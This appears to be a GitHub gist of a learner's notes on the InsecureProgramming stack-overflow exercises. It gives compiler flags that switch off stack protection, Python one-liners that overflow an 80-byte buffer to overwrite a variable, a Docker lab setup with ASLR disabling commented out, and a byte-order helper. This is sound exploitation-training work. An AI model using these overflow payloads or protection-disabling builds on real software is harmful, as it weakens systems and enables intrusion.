@mberrueta
Last active October 20, 2018 18:50
InsecureProgramming

docker exec -it pc1_seg bash

run

docker-compose up -d
docker exec -it pc1_seg bash

Ex 1

gcc -m32 -fno-stack-protector -ggdb -mpreferred-stack-boundary=2 -z execstack -o stack1 stack1.c
# view code
# $ cat stack1.c

# hex to string
# $ python -c 'print("41424344".decode("hex"))' #> ABCD

# resolve (x86 is little-endian, so the value 0x41424344 is typed as DCBA)
# python -c 'print("." * 80 + "DCBA")' #> ................................................................................DCBA

# $ ./stack1
# buf: ffb5fdf0 cookie: ffb5fe40
# ................................................................................DCBA
# you win!

Ex 2

# gcc -m32 -fno-stack-protector -ggdb -mpreferred-stack-boundary=2 -z execstack -o stack2 stack2.c
# view code debugging
# $ gdb stack2
# $ (gdb) list

# resolve
# $ python -c 'print("." * 80 + "05030201".decode("hex"))' | ./stack2
# you win!

Ex 3

# same as Ex 2???
# gcc -m32 -fno-stack-protector -ggdb -mpreferred-stack-boundary=2 -z execstack -o stack3 stack3.c
# view code
# cat stack3.c

# resolve
# $ python -c 'print("." * 80 + "05000201".decode("hex"))' | ./stack3
# you win!
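
Added example, not part of the original gist: the byte order behind the inputs in Ex 1 to Ex 3, written for Python 3, where `"...".decode("hex")` no longer exists and `print()` on bytes emits the `b'...'` repr. The function names are illustrative, and the 32-bit little-endian layout is assumed from the `-m32` x86 build; the integer values are just the page's hex strings read in that layout.

```python
import struct
import sys

FILL_LEN = 80  # filler length used in the notes above ("." * 80)


def hex_to_bytes(hex_str):
    """Python 3 replacement for Python 2's "41424344".decode("hex")."""
    return bytes.fromhex(hex_str)


def as_le_int(hex_str):
    """Integer a 32-bit little-endian CPU reads from these four bytes in memory."""
    (value,) = struct.unpack("<I", hex_to_bytes(hex_str))
    return value


def le_bytes(value):
    """Bytes, in memory order, that hold a 32-bit integer on little-endian x86."""
    return struct.pack("<I", value)


def build_line(value, fill=b".", fill_len=FILL_LEN):
    """Filler followed by the integer in memory order, as in Ex 1 to Ex 3."""
    return fill * fill_len + le_bytes(value)


def write_raw(data, stream=None):
    """Write the bytes unchanged plus a newline; returns the byte count written."""
    if stream is None:
        stream = sys.stdout.buffer  # binary stdout, no text encoding applied
    stream.write(data + b"\n")
    return len(data) + 1


if __name__ == "__main__":
    # Memory-order hex strings taken from the notes above ("DCBA" is Ex 1's input).
    for label, mem_hex in (("Ex 1", b"DCBA".hex()),
                           ("Ex 2", "05030201"),
                           ("Ex 3", "05000201")):
        value = as_le_int(mem_hex)
        # The packed integer must reproduce exactly the bytes typed in the notes.
        assert build_line(value)[FILL_LEN:] == hex_to_bytes(mem_hex)
        print("%s: bytes %s in memory = integer 0x%08x" % (label, mem_hex, value))
```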

Ex 4

# gcc -m32 -fno-stack-protector -ggdb -mpreferred-stack-boundary=2 -z execstack -o stack4 stack4.c
# view code debugging
# $ gdb stack4
# $ (gdb) list
# ??? ¯\_(ツ)_/¯

version: '3'
services:
  pc1_seg:
    container_name: pc1_seg
    build: .
    stdin_open: true
    tty: true

FROM debian:stable
RUN apt update
RUN apt install -y git gcc gcc-multilib g++-multilib python vim gdb
# RUN sysctl -w kernel.randomize_va_space=0 # disable security flags (ASLR)
RUN git clone https://github.com/gerasdf/insecureProgramming/
WORKDIR /insecureProgramming/exercises/
# copy host to container: ADD /my_app_folder /my_app_folder
# run command on execution: CMD "echo" "Hello docker!"
# environment variables: ENV SERVER_WORKS 4
# expose ports: EXPOSE 8080
# run on build: RUN aptitude install -y riak
# link host folder to container: VOLUME ["/my_files"]
# WORKDIR ~/.
# After modifying, run `$ docker-compose up --build` to rebuild